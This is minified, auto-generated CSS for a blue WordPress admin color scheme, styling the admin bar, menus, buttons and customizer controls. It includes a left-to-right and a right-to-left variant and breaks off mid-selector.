.ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:#fff;background:#4796b3}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:#fff}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:#fff}#wpadminbar .menupop .ab-sub-wrapper{background:#4796b3}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(116.162375,182.0949364754,205.537625)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:#e2ecf1}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:#e5f8ff}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:#fff}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:#fff}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:#e5f8ff}#wpadminbar #adminbarsearch:before{color:#e5f8ff}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(109.571875,185.228125,212.128125)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#e1a948}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(202.5,152.1,64.8)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(109.571875,185.228125,212.128125);background-color:rgb(109.571875,185.228125,212.128125)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info .username{color:#e2ecf1}.wp-pointer .wp-pointer-content h3{background-color:#096484;border-color:rgb(7.3723404255,81.914893617,108.1276595745)}.wp-pointer .wp-pointer-content h3:before{color:#096484}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#096484}.media-item .bar,.media-progress-bar div{background-color:#096484}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #096484}.attachment.details .check{background-color:#096484;box-shadow:0 0 0 1px #fff,0 0 0 2px #096484}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #096484}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#096484}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#096484}.theme-filter.current,.theme-section.current{border-bottom-color:#52accc}body.more-filters-opened .more-filters{color:#fff;background-color:#52accc}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#096484;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#096484;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}div#wp-responsive-toggle a:before{color:#e5f8ff}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#096484}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:#4796b3}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#e5f8ff}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#096484}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-left-color:#e1a948}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#e1a948}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-left-color:#e1a948}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-left-color:#e1a948;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#e1a948}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#e1a948;border-style:solid;box-shadow:0 0 0 1px #e1a948;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#e1a948}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#e1a948}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#e1a948}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#e1a948;color:#0073aa}/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#52accc}.wp-core-ui .wp-ui-text-primary{color:#52accc}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#096484}.wp-core-ui .wp-ui-text-highlight{color:#096484}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#e1a948}.wp-core-ui .wp-ui-text-notification{color:#e1a948}.wp-core-ui .wp-ui-text-icon{color:#e5f8ff}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#52accc}.view-switch a:hover:before{color:#e1a948}#adminmenu,#adminmenuback,#adminmenuwrap{background:#52accc}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:#e5f8ff}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#096484}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:#4796b3}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-left-color:#4796b3}#adminmenu .wp-submenu .wp-submenu-head{color:#e2ecf1}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:#e2ecf1}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:#fff}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-left-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#096484}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#e1a948}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#fff;background:#4796b3}#collapse-button{color:#e5f8ff}#collapse-button:focus,#collapse-button:hover{color:#fff}#wpadminbar{color:#fff;background:#52accc}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:#e5f8ff}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:#fff;background:#4796b3}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:#fff}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:#fff}#wpadminbar .menupop .ab-sub-wrapper{background:#4796b3}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(116.162375,182.0949364754,205.537625)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:#e2ecf1}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:#e5f8ff}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:#fff}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:#fff}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:#e5f8ff}#wpadminbar #adminbarsearch:before{color:#e5f8ff}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(109.571875,185.228125,212.128125)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#e1a948}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(202.5,152.1,64.8)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(109.571875,185.228125,212.128125);background-color:rgb(109.571875,185.228125,212.128125)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info .username{color:#e2ecf1}.wp-pointer .wp-pointer-content h3{background-color:#096484;border-color:rgb(7.3723404255,81.914893617,108.1276595745)}.wp-pointer .wp-pointer-content h3:before{color:#096484}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#096484}.media-item .bar,.media-progress-bar div{background-color:#096484}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #096484}.attachment.details .check{background-color:#096484;box-shadow:0 0 0 1px #fff,0 0 0 2px #096484}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #096484}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme a:hover:after{background:#096484}.theme-browser .theme.add-new-theme a:focus span:after,.theme-browser .theme.add-new-theme a:hover span:after{color:#096484}.theme-filter.current,.theme-section.current{border-bottom-color:#52accc}body.more-filters-opened .more-filters{color:#fff;background-color:#52accc}body.more-filters-opened .more-filters:before{color:#fff}body.more-filters-opened .more-filters:focus,body.more-filters-opened .more-filters:hover{background-color:#096484;color:#fff}body.more-filters-opened .more-filters:focus:before,body.more-filters-opened .more-filters:hover:before{color:#fff}.widgets-chooser li.widgets-chooser-selected{background-color:#096484;color:#fff}.widgets-chooser li.widgets-chooser-selected:before,.widgets-chooser li.widgets-chooser-selected:focus:before{color:#fff}.nav-menus-php .item-edit:focus:before{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}div#wp-responsive-toggle a:before{color:#e5f8ff}.wp-responsive-open div#wp-responsive-toggle a{border-color:transparent;background:#096484}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a{background:#4796b3}.wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before{color:#e5f8ff}.mce-container.mce-menu .mce-menu-item-normal.mce-active,.mce-container.mce-menu .mce-menu-item-preview.mce-active,.mce-container.mce-menu .mce-menu-item.mce-selected,.mce-container.mce-menu .mce-menu-item:focus,.mce-container.mce-menu .mce-menu-item:hover{background:#096484}.wp-core-ui #customize-controls .control-section .accordion-section-title:focus,.wp-core-ui #customize-controls .control-section .accordion-section-title:hover,.wp-core-ui #customize-controls .control-section.open .accordion-section-title,.wp-core-ui #customize-controls .control-section:hover>.accordion-section-title{color:#0073aa;border-right-color:#e1a948}.wp-core-ui .customize-controls-close:focus,.wp-core-ui .customize-controls-close:hover,.wp-core-ui .customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#e1a948}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-right-color:#e1a948}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-right-color:#e1a948;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#e1a948}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui 